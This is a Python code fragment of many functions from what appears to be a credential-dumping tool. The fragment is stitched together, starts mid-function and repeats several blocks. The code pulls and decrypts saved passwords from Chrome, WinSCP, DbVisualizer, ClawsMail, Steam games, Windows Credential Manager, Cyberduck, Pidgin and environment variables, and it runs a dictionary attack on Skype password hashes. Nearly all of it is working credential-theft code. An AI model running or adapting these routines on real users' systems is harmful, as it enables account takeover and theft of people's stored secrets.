        path_XP = os.environ.get('HOMEDRIVE') + os.sep + os.environ.get('HOMEPATH') + '\AppData\Local\Google\Chrome\User Data\Default\Login Data'
        if os.path.exists(path_XP):
            database_path = path_XP
        elif os.path.exists(path_Win7):
            database_path = path_Win7
        else:
            print_debug('INFO', 'Google Chrome not installed.')
            return
    else:
        print_debug('ERROR', 'Environment variables (HOMEDRIVE or HOMEPATH) have not been found')
        return
    # Connect to the Database
    # NOTE(review): the connection is never closed explicitly.
    conn = sqlite3.connect(database_path)
    cursor = conn.cursor()
    # Get the results
    try:
        cursor.execute('SELECT action_url, username_value, password_value FROM logins')
    except:
        # Any sqlite error is reported as a locked database.
        print_debug('ERROR', 'Google Chrome seems to be used, the database is locked. Kill the process and try again !')
        return
    pwdFound = []
    for result in cursor.fetchall():
        values = {}
        # Decrypt the Password
        # CryptUnprotectData returns (description, data); [1] is the data.
        password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
        if password:
            values['Site'] = result[0]
            values['Username'] = result[1]
            values['Password'] = password
            pwdFound.append(values)
    # print the results
    print_output("Chrome", pwdFound)
def get_logins_info(self):
    """Enumerate WinSCP 2 sessions stored under HKCU and print them.

    Same logic as the sibling WinSCP block: HostName, UserName and Password
    values feed the instance setters, self.decrypt_password() yields the
    password (placeholder on failure) and PortNumber defaults to '22'.

    Returns:
        False when the Sessions key cannot be opened; None otherwise.
    """
    # Read-only access mask.
    accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE
    try:
        key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead)
    except:
        return False
    # [0] is the subkey count.
    num_profiles = win32api.RegQueryInfoKey(key)[0]
    pwdFound = []
    for n in range(num_profiles):
        name_skey = win32api.RegEnumKey(key, n)
        skey = win32api.RegOpenKey(key, name_skey, 0, accessRead)
        # [1] is the value count.
        num = win32api.RegQueryInfoKey(skey)[1]
        port = ''
        values = {}
        # NOTE(review): instance-held hostname/username/hash are not reset per
        # session in this method; a session missing a value may inherit the
        # previous one — confirm against the setters.
        for nn in range(num):
            k = win32api.RegEnumValue(skey, nn)
            if k[0] == 'HostName':
                self.set_hostname(k[1])
            if k[0] == 'UserName':
                self.set_username(k[1])
            if k[0] == 'Password':
                self.set_hash(k[1])
            if k[0] == 'PortNumber':
                port = str(k[1])
        if num != 0:
            if port == '':
                port = '22'
            try:
                password = self.decrypt_password()
            except:
                password = '******'
            values['Hostname'] = self.get_hostname()
            values['Port'] = port
            values['Username'] = self.get_username()
            values['Password'] = password
            pwdFound.append(values)
    # print the results
    print_output("WinSCP", pwdFound)
def get_infos(self, path, passphrase, salt):
    """Parse DbVisualizer's config70/dbvis.xml (older traversal) and print entries.

    Iterates per 'Databases' container element and scans all of its
    descendants, so one dict is produced per container rather than per
    Database child: with several databases in a container, later values
    overwrite earlier ones. Only records whose Password decrypted are kept.

    Args:
        path: DbVisualizer settings directory.
        passphrase: secret forwarded to self.decrypt().
        salt: salt forwarded to self.decrypt().
    """
    xml_file = path + os.sep + 'config70/dbvis.xml'
    if os.path.exists(xml_file):
        tree = ET.ElementTree(file=xml_file)
        pwdFound = []
        values = {}
        for elem in tree.iter('Databases'):
            values = {}
            passwordFound = False
            # iter() walks every descendant of the container, not just direct
            # Database children.
            for e in elem.iter():
                if 'Alias' == e.tag:
                    values['Connection Name'] = str(e.text)
                if 'Userid' == e.tag:
                    values['Userid'] = str(e.text)
                if 'Password' == e.tag:
                    ciphered_password = e.text
                    try:
                        password = self.decrypt(salt, ciphered_password, passphrase)
                        values['Password'] = password
                        passwordFound = True
                    except:
                        pass
                if 'UrlVariables' == e.tag:
                    for el in e.getchildren():
                        # Every direct child's text is written to 'Driver';
                        # the last one wins.
                        values['Driver'] = str(el.text).strip()
                        for ele in el.getchildren():
                            if 'Server' == ele.attrib['UrlVariableName']:
                                values['Server'] = str(ele.text)
                            if 'Port' == ele.attrib['UrlVariableName']:
                                values['Port'] = str(ele.text)
                            if 'SID' == ele.attrib['UrlVariableName']:
                                values['SID'] = str(ele.text)
            if passwordFound:
                pwdFound.append(values)
        # print the results
        print_output('DbVisualizer', pwdFound)
def run(self):
    """Decrypt ClawsMail's accountrc via self.accountrc_decrypt() and print it.

    Uses DES CFB mode, or ECB on FreeBSD. NOTE(review): when self.get_path()
    returns a falsy value the "not installed" message is printed but the
    method does not return, so accountrc_decrypt() is still called with that
    path (the sibling ClawsMail block returns here).
    """
    # print the title
    Header().title_info('ClawsMail')
    path = self.get_path()
    if not path:
        print_debug('INFO', 'ClawsMail not installed.')
    mode = DES.MODE_CFB
    if 'FreeBSD' in platform.system():
        mode = DES.MODE_ECB
    pwdFound = self.accountrc_decrypt(path, self.get_passcrypt_key(), mode)
    # print the results
    print_output('ClawsMail', pwdFound)
def run(self):
    """Read galcon.cfg from every Steam userdata profile and print fixed-offset fields.

    SteamPath is taken from the HKCU Steam key; for each directory under
    userdata, <id>/44200/remote/galcon.cfg is opened in binary mode and two
    fixed byte ranges are reported as Login and Password.
    """
    # print title
    Header().title_info('Galcon Fusion')
    creds = []
    # Find the location of steam - to make it easier we're going to use a try block
    # 'cos I'm lazy
    try:
        with OpenKey(HKEY_CURRENT_USER, 'Software\Valve\Steam') as key:
            # QueryValueEx returns (data, type); [0] is used below.
            results=QueryValueEx(key, 'SteamPath')
    except:
        print_debug('INFO', 'Steam does not appear to be installed.')
        return
    if not results:
        print_debug('INFO', 'Steam does not appear to be installed.')
        return
    steampath=results[0]
    userdata = steampath + '\\userdata'
    # Check that we have a userdata directory
    if not os.path.exists(userdata):
        print_debug('ERROR', 'Steam doesn\'t have a userdata directory.')
        return
    # Now look for Galcon Fusion in every user
    files = os.listdir(userdata)
    # `file` shadows the builtin within this loop.
    for file in files:
        # 44200 is presumably the Steam app id of Galcon Fusion — confirm.
        filepath = userdata + '\\' + file + '\\44200\\remote\\galcon.cfg'
        if not os.path.exists(filepath):
            continue
        # If we're here we should have a Galcon Fusion file
        with open(filepath, mode='rb') as cfgfile:
            # We've found a config file, now extract the creds
            data = cfgfile.read()
            values = {}
            # Fixed-width fields; a short file simply yields shorter slices.
            values['Login'] = data[4:0x23]
            values['Password'] = data[0x24:0x43]
            creds.append(values)
    print_output("Galcon Fusion", creds)
def run(self):
    """Decrypt ClawsMail's accountrc via self.accountrc_decrypt() and print it.

    Returns early when self.get_path() yields nothing. DES CFB mode is used,
    or ECB when platform.system() reports FreeBSD.
    """
    # print the title
    Header().title_info('ClawsMail')
    path = self.get_path()
    if not path:
        print_debug('INFO', 'ClawsMail not installed.')
        return
    mode = DES.MODE_CFB
    # Platform-dependent cipher mode, as chosen by the original author.
    if 'FreeBSD' in platform.system():
        mode = DES.MODE_ECB
    pwdFound = self.accountrc_decrypt(path, self.get_passcrypt_key(), mode)
    # print the results
    print_output('ClawsMail', pwdFound)
def run(self):
    """Report proxy variables and any environment variable whose name looks password-related.

    http_proxy/https_proxy (two spellings each) are checked first, then every
    variable name containing passwd/pwd/pass/password, excluding PWD and
    OLDPWD. NOTE(review): a single `values` dict is reused and appended each
    time, so all entries in pwdFound are the same object and show the last
    match only; a name matching several patterns is appended once per match.
    """
    values = {}
    pwdFound = []
    # print the title
    Header().title_info("Environment variables")
    # --------- http_proxy --------
    tmp = ""
    if "http_proxy" in os.environ:
        tmp = "http_proxy"
    elif "HTTP_Proxy" in os.environ:
        tmp = "HTTP_Proxy"
    if tmp:
        values["Variable"] = tmp
        values["Password"] = os.environ[tmp]
        pwdFound.append(values)
    # --------- https_proxy --------
    tmp = ""
    if "https_proxy" in os.environ:
        tmp = "https_proxy"
    elif "HTTPS_Proxy" in os.environ:
        tmp = "HTTPS_Proxy"
    if tmp:
        values["Variable"] = tmp
        values["Password"] = os.environ[tmp]
        pwdFound.append(values)
    tab = ["passwd", "pwd", "pass", "password"]
    for i in os.environ:
        for t in tab:
            # Case-insensitive substring match; PWD/OLDPWD are shell cwd vars.
            if (t.upper() in i.upper()) and (i.upper() != "PWD") and (i.upper() != "OLDPWD"):
                values["Variable"] = i
                values["Password"] = os.environ[i]
                pwdFound.append(values)
    # write credentials into a text file
    if len(values) != 0:
        # print the results
        print_output("Environnement variables", pwdFound)
    else:
        print_debug("INFO", "No passwords stored in the environment variables.")
def retrieve_password(self):
    """Report proxy variables and any environment variable whose name looks password-related.

    Same logic as the sibling environment-variables block (title_debug and
    single quotes differ). NOTE(review): one `values` dict is reused for every
    append, so pwdFound holds the same object repeatedly and only the last
    match is visible; names matching several patterns are appended per match.
    """
    values = {}
    pwdFound = []
    # print the title
    Header().title_debug('Environnement variables')
    # --------- http_proxy --------
    tmp = ''
    if 'http_proxy' in os.environ:
        tmp = 'http_proxy'
    elif 'HTTP_Proxy' in os.environ:
        tmp = 'HTTP_Proxy'
    if tmp:
        values["Variable"] = tmp
        values["Password"] = os.environ[tmp]
        pwdFound.append(values)
    # --------- https_proxy --------
    tmp = ''
    if 'https_proxy' in os.environ:
        tmp = 'https_proxy'
    elif 'HTTPS_Proxy' in os.environ:
        tmp = 'HTTPS_Proxy'
    if tmp:
        values["Variable"] = tmp
        values["Password"] = os.environ[tmp]
        pwdFound.append(values)
    tab = ['passwd', 'pwd', 'pass', 'password']
    for i in os.environ:
        for t in tab:
            # Case-insensitive substring match; PWD/OLDPWD are shell cwd vars.
            if (t.upper() in i.upper()) and (i.upper() != 'PWD') and (i.upper() != 'OLDPWD'):
                values["Variable"] = i
                values["Password"] = os.environ[i]
                pwdFound.append(values)
    # write credentials into a text file
    if len(values) != 0:
        # print the results
        print_output('Environnement variables', pwdFound)
    else:
        print_debug('INFO', 'No passwords stored in the environment variables.')
def retrieve_password(self):
    """Report CRED_TYPE_GENERIC entries returned by self.get_creds().

    On XP (platform.release() == 'XP') the blob is passed through
    self.Win32CryptUnprotectData() with self.get_entropy(); on other
    releases the blob is used as-is. The result is UTF-16 decoded and
    printed with the TargetName (stripped of 'Microsoft_WinInet_') and
    UserName. Nothing is returned.
    """
    # print title
    Header().title_debug('Generic Network')
    os_plateform = platform.release()
    a = self.get_creds()
    pwd = ''
    pwdFound = []
    if a:
        for i in a:
            values = {}
            if i['Type'] == win32cred.CRED_TYPE_GENERIC:
                cipher_text = i['CredentialBlob']
                if os_plateform == 'XP':
                    pwd = self.Win32CryptUnprotectData( cipher_text, self.get_entropy())
                else:
                    pwd = cipher_text
                # 'failed' is the helper's failure sentinel.
                if pwd != 'failed':
                    targetName = i['TargetName'].replace( 'Microsoft_WinInet_', '')
                    values['TargetName'] = targetName
                    if os_plateform == 'XP':
                        # NOTE(review): the truncated targetName is computed
                        # after values['TargetName'] was set and is never used.
                        t = targetName.split('/')
                        targetName = t[0]
                    if i['UserName'] is not None:
                        values['Username'] = i['UserName']
                    try:
                        values['Password'] = pwd.decode('utf16')
                    except:
                        values['INFO'] = 'Error decoding the password'
                    pwdFound.append(values)
        # print the results
        print_output("Generic Network", pwdFound)
    else:
        print_debug('INFO', 'No credentials listed with the enum cred function')
def parse_xml(self, xml_file):
    """Print Cyberduck entries whose 'name' attribute is an ftp/sftp/http URL.

    The 'value' attribute is base64-decoded and unprotected with
    CryptUnprotectData (DPAPI, current-user scope). Elements without the
    expected attributes, or whose decoding fails, are skipped by the bare
    except.

    Args:
        xml_file: path of the XML file to parse.
    """
    tree = ET.ElementTree(file=xml_file)
    pwdFound = []
    for elem in tree.iter():
        values = {}
        try:
            # 'ftps' and 'https' are already covered by the 'ftp' / 'http'
            # prefixes; only 'sftp' adds a new case.
            if elem.attrib['name'].startswith('ftp') or elem.attrib['name'].startswith('ftps') or elem.attrib['name'].startswith('sftp') or elem.attrib['name'].startswith('http') or elem.attrib['name'].startswith('https'):
                values['URL'] = elem.attrib['name']
                encrypted_password = base64.b64decode(elem.attrib['value'])
                # CryptUnprotectData returns (description, data); [1] is the data.
                password = win32crypt.CryptUnprotectData(encrypted_password, None, None, None, 0)[1]
                values['Password'] = password
                pwdFound.append(values)
        except:
            pass
    # print the results
    print_output("Cyberduck", pwdFound)
def run(self):
    """Read Turba's Settings.bin under SteamApps and print its first two lines after offset 0x1b.

    SteamPath is taken from the HKCU Steam key. The file is read in binary
    mode; bytes from offset 0x1b are split on '\\n' and the first two chunks
    are reported as Login and Password.
    """
    # print title
    Header().title_info('Turba')
    creds = []
    # Find the location of steam - to make it easier we're going to use a try block
    # 'cos I'm lazy
    try:
        with OpenKey(HKEY_CURRENT_USER, 'Software\Valve\Steam') as key:
            # QueryValueEx returns (data, type).
            results=QueryValueEx(key, 'SteamPath')
    except:
        print_debug('INFO', 'Steam does not appear to be installed.')
        return
    if not results:
        print_debug('INFO', 'Steam does not appear to be installed.')
        return
    steampath=results[0]
    steamapps = steampath + '\\SteamApps\common'
    # Check that we have a SteamApps directory
    if not os.path.exists(steamapps):
        print_debug('ERROR', 'Steam doesn\'t have a SteamApps directory.')
        return
    filepath = steamapps + '\\Turba\\Assets\\Settings.bin'
    if not os.path.exists(filepath):
        print_debug('INFO', 'Turba doesn\'t appear to be installed.')
        return
    # If we're here we should have a valid config file file
    # NOTE(review): `filepath` is rebound to the file object inside the block.
    with open(filepath, mode='rb') as filepath:
        # We've found a config file, now extract the creds
        data = filepath.read()
        values = {}
        chunk=data[0x1b:].split('\x0a')
        values['Login'] = chunk[0]
        # IndexError if the payload holds fewer than two lines.
        values['Password'] = chunk[1]
        creds.append(values)
    print_output("Turba", creds)
def run(self):
    """Read Turba's Settings.bin under SteamApps and print its first two lines after offset 0x1b.

    Same logic as the sibling Turba block (spacing only differs): SteamPath
    comes from the HKCU Steam key, the file is read in binary mode and the
    first two '\\n'-separated chunks after offset 0x1b become Login and
    Password.
    """
    # print title
    Header().title_info('Turba')
    creds = []
    # Find the location of steam - to make it easier we're going to use a try block
    # 'cos I'm lazy
    try:
        with OpenKey(HKEY_CURRENT_USER, 'Software\Valve\Steam') as key:
            # QueryValueEx returns (data, type).
            results = QueryValueEx(key, 'SteamPath')
    except:
        print_debug('INFO', 'Steam does not appear to be installed.')
        return
    if not results:
        print_debug('INFO', 'Steam does not appear to be installed.')
        return
    steampath = results[0]
    steamapps = steampath + '\\SteamApps\common'
    # Check that we have a SteamApps directory
    if not os.path.exists(steamapps):
        print_debug('ERROR', 'Steam doesn\'t have a SteamApps directory.')
        return
    filepath = steamapps + '\\Turba\\Assets\\Settings.bin'
    if not os.path.exists(filepath):
        print_debug('INFO', 'Turba doesn\'t appear to be installed.')
        return
    # If we're here we should have a valid config file file
    # NOTE(review): `filepath` is rebound to the file object inside the block.
    with open(filepath, mode='rb') as filepath:
        # We've found a config file, now extract the creds
        data = filepath.read()
        values = {}
        chunk = data[0x1b:].split('\x0a')
        values['Login'] = chunk[0]
        # IndexError if the payload holds fewer than two lines.
        values['Password'] = chunk[1]
        creds.append(values)
    print_output("Turba", creds)
def run(self):
    # Pidgin module: read <profile>\.purple\accounts.xml and report each
    # account whose <password> element is present, via print_output().
    # The profile directory comes from constant.appdata first, then the
    # APPDATA environment variable. Windows-style backslash paths throughout.
    # print title
    Header().title_info('Pidgin')
    # '\.' is not an escape sequence, so the literal is "\.purple" as intended.
    if constant.appdata:
        directory = '%s\.purple' % constant.appdata
        path = os.path.join(directory, 'accounts.xml')
    elif 'APPDATA' in os.environ:
        directory = os.environ['APPDATA'] + '\.purple'
        path = os.path.join(directory, 'accounts.xml')
    else:
        print_debug('ERROR', 'The APPDATA environment variable is not defined.')
        return
    if os.path.exists(path):
        # Artifact read: accounts.xml, parsed with xml.etree as-is (no size
        # or well-formedness guard; a malformed file raises ParseError here).
        tree = ET.ElementTree(file=path)
        root = tree.getroot()
        # getchildren() was removed in Python 3.9; list(root) is the
        # equivalent. Kept as-is because this file targets Python 2.
        accounts = root.getchildren()
        pwdFound = []
        for a in accounts:
            values = {}
            aa = a.getchildren()
            noPass = True
            for tag in aa:
                # `cpt` is assigned but never read; it is dead code.
                cpt = 0
                if tag.tag == 'name':
                    cpt = 1
                    values['Login'] = tag.text
                # The <password> text is taken verbatim with no decoding, so
                # the module assumes it is stored unencrypted in the file.
                if tag.tag == 'password':
                    values['Password'] = tag.text
                    noPass = False
            # Only accounts with a <password> element are reported; an
            # account without a <name> still yields an entry lacking 'Login'.
            # (`not noPass` is the idiomatic spelling of this test.)
            if noPass == False:
                pwdFound.append(values)
        # print the results
        print_output("Pidgin", pwdFound)
    else:
        print_debug('INFO', 'Pidgin not installed.')
def run(self):
    # Skype module: for each profile directory under %APPDATA%\Skype that
    # holds a config.xml, pull the stored credential hash with the sibling
    # helpers (get_regkey / get_hash_credential / get_md5_hash /
    # dictionary_attack, not visible here) and report via print_output().
    # Python 2 only: the `except Exception, e` form below is a SyntaxError
    # on Python 3.
    # print title
    Header().title_info("Skype")
    if "APPDATA" in os.environ:
        # '\S' is not an escape sequence, so this is "...\Skype" literally.
        directory = os.environ["APPDATA"] + "\Skype"
        if os.path.exists(directory):
            # retrieve the key used to build the salt
            # The helpers signal failure with the string sentinel "failed"
            # rather than an exception or None.
            key = self.get_regkey()
            if key == "failed":
                print_debug("ERROR", "The salt has not been retrieved")
            else:
                pwdFound = []
                # Every directory entry is treated as a profile name; only
                # those containing config.xml are examined.
                for d in os.listdir(directory):
                    if os.path.exists(directory + os.sep + d + os.sep + "config.xml"):
                        values = {}
                        try:
                            values["username"] = d
                            # get encrypted hash from the config file
                            enc_hex = self.get_hash_credential(directory + os.sep + d + os.sep + "config.xml")
                            if enc_hex == "failed":
                                print_debug("WARNING", "No credential stored on the config.xml file.")
                            else:
                                # decrypt the hash to get the md5 to brute force
                                values["hash_md5"] = self.get_md5_hash(enc_hex, key)
                                # Because of the doubled backslashes this value
                                # contains the two characters '\' 'n', not a
                                # newline. The key's spelling ("shema") is a
                                # runtime dict key and is left unchanged.
                                values["shema to bruteforce"] = values["username"] + "\\nskyper\\n<password>"
                                # Try a dictionary attack on the hash
                                password = self.dictionary_attack(values["username"], values["hash_md5"])
                                if password:
                                    values["password"] = password
                                # The entry is reported even when no password
                                # was recovered (assuming the append sits
                                # outside `if password:` as laid out here —
                                # confirm against the original indentation).
                                pwdFound.append(values)
                        # Per-profile failures are logged at DEBUG and the loop
                        # continues; that profile's entry is dropped unless the
                        # append above already ran.
                        except Exception, e:
                            print_debug("DEBUG", "{0}".format(e))
                # print the results
                print_output("Skype", pwdFound)
        # NOTE(review): no message is emitted when APPDATA is unset — this
        # else appears to pair with the os.path.exists() check; confirm.
        else:
            print_debug("INFO", "Skype not installed.")
def run(self):
    # Skype module (same logic as the sibling Skype `run` above, differing
    # only in quote style): walk the profile directories under
    # %APPDATA%\Skype, extract the stored credential hash from each
    # config.xml through the sibling helper methods, and report the
    # results with print_output().
    # Python 2 syntax (`except Exception,e`); will not parse on Python 3.
    # print title
    Header().title_info('Skype')
    if 'APPDATA' in os.environ:
        # '\S' is not an escape; the literal keeps its backslash.
        directory = os.environ['APPDATA'] + '\Skype'
        if os.path.exists(directory):
            # retrieve the key used to build the salt
            # Failure is signalled by the string 'failed', not by an
            # exception — compare against that sentinel, not None.
            key = self.get_regkey()
            if key == 'failed':
                print_debug('ERROR', 'The salt has not been retrieved')
            else:
                pwdFound = []
                # Each directory entry is taken as a profile name; only
                # entries with a config.xml are processed.
                for d in os.listdir(directory):
                    if os.path.exists(directory + os.sep + d + os.sep + 'config.xml'):
                        values = {}
                        try:
                            values['username'] = d
                            # get encrypted hash from the config file
                            enc_hex = self.get_hash_credential(directory + os.sep + d + os.sep + 'config.xml')
                            if enc_hex == 'failed':
                                print_debug('WARNING', 'No credential stored on the config.xml file.')
                            else:
                                # decrypt the hash to get the md5 to brute force
                                values['hash_md5'] = self.get_md5_hash(enc_hex, key)
                                # Doubled backslashes: the stored string holds
                                # literal '\n' characters, not newlines. The
                                # key text ('shema') is runtime data, unchanged.
                                values['shema to bruteforce'] = values['username'] + '\\nskyper\\n<password>'
                                # Try a dictionary attack on the hash
                                password = self.dictionary_attack(values['username'], values['hash_md5'])
                                if password:
                                    values['password'] = password
                                # Appended whether or not a password was found
                                # (assuming this line is outside `if password:`
                                # as reconstructed here — confirm).
                                pwdFound.append(values)
                        # Any error for one profile is logged at DEBUG and the
                        # next profile is processed.
                        except Exception,e:
                            print_debug('DEBUG', '{0}'.format(e))
                # print the results
                print_output("Skype", pwdFound)
        # NOTE(review): with APPDATA unset nothing is printed — this else
        # seems to belong to the os.path.exists() check; verify.
        else:
            print_debug('INFO', 'Skype not installed.')